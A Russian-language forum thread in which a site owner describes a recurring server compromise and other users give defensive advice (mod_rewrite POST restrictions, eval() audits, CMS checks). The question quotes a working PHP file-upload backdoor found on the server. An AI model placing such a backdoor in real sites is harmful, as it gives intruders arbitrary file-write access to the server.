Как найти уязвимость на сервере/сайтах?

Question

[Александр]

В общем какая-то зараза залезла на сервер.
Создает переодически(?) различные файлы типа class.php / main.php / и другие интересные названия. Раньше еще редиректы прописывало в .htaccess, но это я поправил изменением прав (такая вот заплатка). А еще оно делает файл с вот таким содержимым:

<?
if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); Exit;}
  if ($_FILES['F1l3']) {
    move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']);
    echo 'OK';
  } else {
    echo 'You are forbidden!';
  }
?>

Искал и айболитом и с помощью:
find ./ -name '*.php' | xargs grep -E '[0-9a-zA-Z/]{80}' > viruses.txt

что-то находил, что-то удалял, но пока не помогло.
чего еще сотворить? эта зараза лезет не в конкретную cms, хотя я раньше думал, что так. На данный момент создает эти файлы тупо в корне сайта. До этого они проявлялись в самых далеких местах, после вчерашней чистки пока только в корне.

Answer 1

[ugodrus]

Была такая проблема. Через дырку в старой CMS размещали скрипты для рассылки Мылом. Зная что в CMS только две точки входа написал правило через mod_rewrite
Если метод запроса - POST и файл к которому обращаются - не один из этих двух, то показать ему кукиш.
Это на перифирии. А также, поставил запреты на доступ ко всем административным папкам, контент которых инклудится. И в конце отыскал все скрипты в которых используется eval(). И все их проверил на иньекции кода. Помогло. Хотя боты до сих пор стучатся.

Answer 2

[ShamblerR]

какая CMS ?
Версия CMS ?
какие модули установлены ?
Пока выясняете отключите SuEXEC

Answer 3

[Maximbl4]

Возникла аналогичная проблема, айболит не обнаруживает эту угрозу, обычный поиск по содержимому помог избавиться, но хотелось бы более радикальным способом защитить сайт от этой заразы.
Можно ли как-нибудь в .htaccess запретить эти запросы?